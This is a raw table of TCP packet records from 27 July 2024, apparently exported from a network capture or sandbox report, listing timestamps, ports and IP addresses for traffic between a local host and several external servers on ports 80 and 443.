Jul 27, 2024 07:30:36.566255093 CEST	80	51831	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:36.566325903 CEST	51831	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:36.572067976 CEST	51831	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:36.578052044 CEST	51833	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:36.578809977 CEST	80	51831	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:36.583192110 CEST	80	51833	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:36.583271980 CEST	51833	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:36.583403111 CEST	51833	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:36.583436966 CEST	51833	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:36.588334084 CEST	80	51833	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:36.588430882 CEST	80	51833	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:36.640067101 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.640130997 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.640362978 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.640388966 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.640403986 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.640410900 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.827559948 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:36.827632904 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:36.827763081 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:36.856451035 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:36.856476068 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:36.970824957 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:36.970855951 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:36.970930099 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:36.971309900 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:36.971324921 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:37.009685040 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:37.009740114 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:37.009826899 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:37.010138988 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:37.010160923 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:37.489964008 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:37.490056992 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:37.492265940 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:37.492290020 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:37.492647886 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:37.493864059 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:37.494014025 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:37.494060993 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:37.586110115 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:37.586216927 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:37.588707924 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:37.588716984 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:37.589927912 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:37.589931965 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:37.589994907 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:37.594072104 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:37.594084024 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:37.872275114 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:37.872315884 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:37.872467995 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:37.892064095 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:37.892081022 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.095077991 CEST	80	51833	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:38.095150948 CEST	80	51833	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:38.095316887 CEST	51833	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:38.101247072 CEST	51833	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:38.106421947 CEST	80	51833	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:38.198052883 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:38.198159933 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:38.198261023 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:38.260958910 CEST	51836	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:38.260994911 CEST	443	51836	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:38.261976957 CEST	51838	80	192.168.2.5	109.172.114.212
Jul 27, 2024 07:30:38.267118931 CEST	80	51838	109.172.114.212	192.168.2.5
Jul 27, 2024 07:30:38.267258883 CEST	51838	80	192.168.2.5	109.172.114.212
Jul 27, 2024 07:30:38.273417950 CEST	51838	80	192.168.2.5	109.172.114.212
Jul 27, 2024 07:30:38.278517008 CEST	80	51838	109.172.114.212	192.168.2.5
Jul 27, 2024 07:30:38.358861923 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.358922958 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:38.383287907 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:38.383304119 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.383836985 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.447052002 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:38.492501974 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.680233955 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.680274963 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.680336952 CEST	443	51837	104.26.3.16	192.168.2.5
Jul 27, 2024 07:30:38.680377007 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:38.680377960 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:38.806921005 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:38.807003975 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:38.807084084 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:38.829334021 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:38.829360962 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:38.829399109 CEST	51834	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:38.829407930 CEST	443	51834	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:38.881680012 CEST	51837	443	192.168.2.5	104.26.3.16
Jul 27, 2024 07:30:38.939570904 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:38.939665079 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:38.939739943 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:38.940289021 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:38.940325975 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:39.240426064 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.240458012 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:39.240539074 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.241199970 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.241213083 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:39.602500916 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:39.602598906 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:39.605482101 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:39.605504036 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:39.605588913 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:39.605601072 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:39.605926991 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:39.605936050 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:39.606009960 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:39.606321096 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:39.606344938 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:39.715179920 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:39.715308905 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.716542959 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.716551065 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:39.716873884 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:39.718579054 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.718801975 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.718846083 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:39.718911886 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:39.718918085 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:40.074417114 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:40.074449062 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:40.074513912 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:40.079139948 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:40.079159975 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:40.173567057 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:40.173672915 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:40.173865080 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:40.176959038 CEST	51841	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:40.176980972 CEST	443	51841	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:40.410909891 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:40.411020041 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:40.411094904 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:40.428075075 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:40.428129911 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:40.428160906 CEST	51840	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:40.428179026 CEST	443	51840	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:40.539958954 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:40.540052891 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:40.540139914 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:40.540528059 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:40.540563107 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:40.723943949 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:40.724150896 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:40.727900982 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:40.727931976 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:40.728353977 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:40.734015942 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:40.759591103 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:40.759620905 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:40.759776115 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:40.760076046 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:40.760091066 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:40.776529074 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.092024088 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.094065905 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.094254971 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.094321012 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.099112034 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.099191904 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.099210024 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.099656105 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.104675055 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.104744911 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.115741968 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.115824938 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.137180090 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:41.137275934 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:41.139770031 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:41.139792919 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:41.139869928 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:41.139880896 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:41.140031099 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:41.142085075 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:41.182693958 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.182831049 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.182879925 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.182913065 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.182941914 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.182980061 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.188520908 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:41.193619013 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.193703890 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.193736076 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.193924904 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.197032928 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.197108984 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.207271099 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.207346916 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.212337017 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.212412119 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.222538948 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.222610950 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.229595900 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:41.229671001 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:41.230884075 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:41.230895042 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:41.231224060 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:41.235083103 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:41.235110998 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:41.235169888 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:41.237961054 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:41.237971067 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:41.244477034 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.244699001 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.271282911 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.271380901 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.271485090 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.271486044 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.271554947 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.272196054 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.272279024 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.272298098 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.272510052 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.273009062 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.273077011 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.273116112 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.273185015 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.275116920 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.275192022 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.279880047 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.279973030 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.288074970 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.288176060 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.291798115 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.291901112 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.298821926 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.298903942 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.302149057 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.302212954 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.305485964 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.305546045 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.311855078 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.311923981 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.314799070 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.314867020 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.322823048 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.333195925 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.333281994 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.359695911 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.359898090 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.359904051 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.359966040 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.360008955 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.360012054 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.360081911 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.360100031 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.360622883 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.360681057 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.360696077 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.360738039 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.360804081 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.360816956 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.362411976 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.362468958 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.362498999 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.362514973 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.362544060 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.363647938 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.363723040 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.363739014 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.368124962 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.368205070 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.368220091 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.368688107 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.372589111 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.372674942 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.372704983 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.372780085 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.376557112 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.376635075 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.381340981 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.381414890 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.381515980 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.381582022 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.383976936 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.384061098 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.387598991 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.387682915 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.387684107 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.387710094 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.387767076 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.390892029 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.390961885 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.394912958 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.395001888 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.397624969 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.397699118 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.397703886 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.397717953 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.397774935 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.400453091 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.400522947 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.403799057 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.403872967 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.403997898 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.404057980 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.421711922 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.421746969 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.421914101 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.421915054 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.421979904 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.448762894 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.448880911 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.448951006 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.448951006 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.449019909 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449058056 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449163914 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449227095 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.449246883 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449285984 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449342966 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.449357986 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449414968 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449441910 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.449461937 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449489117 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.449892044 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.449955940 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.449970961 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450010061 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450063944 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.450078964 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450714111 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450781107 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.450794935 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450850964 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450860977 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.450875998 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450911045 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.450938940 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.450993061 CEST	51842	443	192.168.2.5	31.14.70.245
